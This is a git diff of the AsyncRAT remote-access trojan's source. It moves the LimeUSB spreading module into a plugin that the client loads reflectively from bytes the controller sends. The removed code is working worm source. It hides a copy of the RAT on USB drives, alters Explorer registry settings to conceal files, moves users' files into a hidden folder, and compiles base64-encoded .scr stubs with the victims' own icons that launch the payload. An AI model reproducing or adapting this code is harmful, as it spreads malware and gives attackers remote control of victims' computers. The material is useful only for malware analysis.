diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
index 9d29a07..063211e 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs
@@ -851,6 +851,7 @@ namespace AsyncRAT_Sharp
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "usbSpread";
+ msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.HandleLimeUSB);
foreach (ListViewItem itm in listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs
index ffd5a41..276f628 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs
@@ -194,6 +194,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
+ ///
+ /// Looks up a localized resource of type System.Byte[].
+ ///
+ internal static byte[] HandleLimeUSB {
+ get {
+ object obj = ResourceManager.GetObject("HandleLimeUSB", resourceCulture);
+ return ((byte[])(obj));
+ }
+ }
+
///
/// Looks up a localized resource of type System.Drawing.Bitmap.
///
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
index c6d33a2..cd0c10e 100644
--- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
+++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx
@@ -238,4 +238,7 @@
..\Resources\save-image2.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
+
+ ..\Resources\HandleLimeUSB.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/HandleLimeUSB.dll b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/HandleLimeUSB.dll
new file mode 100644
index 0000000..c4fc313
Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/HandleLimeUSB.dll differ
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs b/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
index 9775d7a..7b68fe6 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
+++ b/AsyncRAT-C#/Client/Handle Packet/HandleLimeUSB.cs
@@ -1,16 +1,6 @@
-using System;
-using System.Collections.Generic;
-using System.Diagnostics;
-using System.IO;
-using System.Text;
-using System.Drawing.IconLib; // AsyncRAT-C#\packages\IconLib
-using Microsoft.Win32;
-using System.Drawing;
-using Microsoft.CSharp;
-using System.CodeDom.Compiler;
-using Client.MessagePack;
+using Client.MessagePack;
using Client.Sockets;
-using System.Windows.Forms;
+using System.Reflection;
//
// │ Author : NYAN CAT
// │ Name : LimeUSB v0.3
@@ -23,45 +13,12 @@ namespace Client.Handle_Packet
{
public class HandleLimeUSB
{
- public void Run()
+ public HandleLimeUSB(MsgPack unpack_msgpack)
{
- Initialize();
- }
-
- private void Initialize()
- {
- ExplorerOptions();
- int count = 0;
- foreach (DriveInfo usb in DriveInfo.GetDrives())
- {
- try
- {
- if (usb.DriveType == DriveType.Removable && usb.IsReady)
- {
- if (!Directory.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory))
- {
- Directory.CreateDirectory(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory);
- File.SetAttributes(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
- }
-
- if (!Directory.Exists((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory)))
- Directory.CreateDirectory((usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory));
-
- if (!File.Exists(usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile))
- File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
-
- CreteDirectory(usb.RootDirectory.ToString());
-
- InfectFiles(usb.RootDirectory.ToString());
-
- count++;
- }
- }
- catch (Exception ex)
- {
- Debug.WriteLine("Initialize " + ex.Message);
- }
- }
+ Assembly loader = Assembly.Load(unpack_msgpack.ForcePathObject("Plugin").GetAsBytes());
+ MethodInfo meth = loader.GetType("HandleLimeUSB.HandleLimeUSB").GetMethod("Initialize");
+ object injObj = loader.CreateInstance(meth.Name);
+ int count = (int)meth.Invoke(injObj, null);
if (count > 0)
{
MsgPack msgpack = new MsgPack();
@@ -70,156 +27,5 @@ namespace Client.Handle_Packet
ClientSocket.Send(msgpack.Encode2Bytes());
}
}
-
- private void ExplorerOptions()
- {
- try
- {
- RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
- if (key.GetValue("Hidden") != (object)2)
- key.SetValue("Hidden", 2);
- if (key.GetValue("HideFileExt") != (object)1)
- key.SetValue("HideFileExt", 1);
- }
- catch { }
- }
-
- private void InfectFiles(string path)
- {
- foreach (var file in Directory.GetFiles(path))
- {
- try
- {
- if (CheckIfInfected(file))
- {
- ChangeIcon(file);
- File.Move(file, file.Insert(3, spreadSettings.WorkDirectory + "\\"));
- CompileFile(file);
- }
- }
- catch { }
- }
-
- foreach (var directory in Directory.GetDirectories(path))
- {
- try
- {
- if (!directory.Contains(spreadSettings.WorkDirectory))
- InfectFiles(directory);
- }
- catch { }
- }
- }
-
- private void CreteDirectory(string usbDirectory)
- {
- foreach (var directory in Directory.GetDirectories(usbDirectory))
- {
- try
- {
- if (!directory.Contains(spreadSettings.WorkDirectory))
- {
- if (!Directory.Exists(directory.Insert(3, spreadSettings.WorkDirectory + "\\")))
- Directory.CreateDirectory(directory.Insert(3, spreadSettings.WorkDirectory + "\\"));
- CreteDirectory(directory);
- }
- }
- catch { }
- }
- }
-
- private bool CheckIfInfected(string file)
- {
- try
- {
- FileVersionInfo info = FileVersionInfo.GetVersionInfo(file);
- if (info.LegalTrademarks == spreadSettings.InfectedTrademark)
- return false;
- else
- return true;
- }
- catch
- {
- return false;
- }
- }
-
- private void ChangeIcon(string file)
- {
- try
- {
- Icon fileIcon = Icon.ExtractAssociatedIcon(file);
- MultiIcon multiIcon = new MultiIcon();
- SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file));
- singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista);
- singleIcon.Save(Path.GetPathRoot(file) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
- }
- catch { }
- }
-
- private void CompileFile(string infectedFile)
- {
- try
- {
- string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyBMaW1lVVNCTW9kdWxlCnsKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBNYWluKCkKICAgIHsKICAgICAgICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJUZpbGUlIik7CiAgICAgICAgICAgIFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLlN0YXJ0KEAiJVBheWxvYWQlIik7CiAgICAgICAgfQogICAgICAgIGNhdGNoIHsgfQogICAgfQp9"));
- source = source.Replace("LimeUSBModule", Randomz(new Random().Next(6, 12)));
- source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.LimeUSBFile);
- source = source.Replace("%File%", infectedFile.Insert(3, spreadSettings.WorkDirectory + "\\"));
- source = source.Replace("%Lime%", spreadSettings.InfectedTrademark);
- source = source.Replace("%Guid%", Guid.NewGuid().ToString());
-
- CompilerParameters cParams = new CompilerParameters();
- Dictionary providerOptions = new Dictionary();
- providerOptions.Add("CompilerVersion", GetOS());
-
- string options = "/target:winexe /platform:x86 /optimize+";
- if (File.Exists(Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"))
- options += " /win32icon:\"" + Path.GetPathRoot(infectedFile) + spreadSettings.WorkDirectory + "\\" + spreadSettings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico" + "\"";
- cParams.GenerateExecutable = true;
- cParams.OutputAssembly = infectedFile + ".scr";
- cParams.CompilerOptions = options;
- cParams.TreatWarningsAsErrors = false;
- cParams.IncludeDebugInformation = false;
- cParams.ReferencedAssemblies.Add("System.dll");
-
- CompilerResults results = new CSharpCodeProvider(providerOptions).CompileAssemblyFromSource(cParams, source);
- }
- catch (Exception ex)
- {
- Debug.WriteLine("CompileFile " + ex.Message);
- }
- }
-
- private string GetOS()
- {
- var os = new Microsoft.VisualBasic.Devices.ComputerInfo();
- if (os.OSFullName.Contains("7"))
- return "v2.0";
- else
- return "v4.0";
- }
-
- private string Randomz(int L)
- {
- string validchars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
- StringBuilder sb = new StringBuilder();
- Random rand = new Random();
- for (int i = 1; i <= L; i++)
- {
- int idx = rand.Next(0, validchars.Length);
- char randomChar = validchars[idx];
- sb.Append(randomChar);
- }
- var randomString = sb.ToString();
- return randomString;
- }
- }
-
- public class spreadSettings
- {
- public static readonly string InfectedTrademark = "Trademark - Lime";
- public static readonly string WorkDirectory = "$LimeUSB";
- public static readonly string LimeUSBFile = Path.GetFileName(Application.ExecutablePath);
- public static readonly string IconsDirectory = "$LimeIcons";
}
}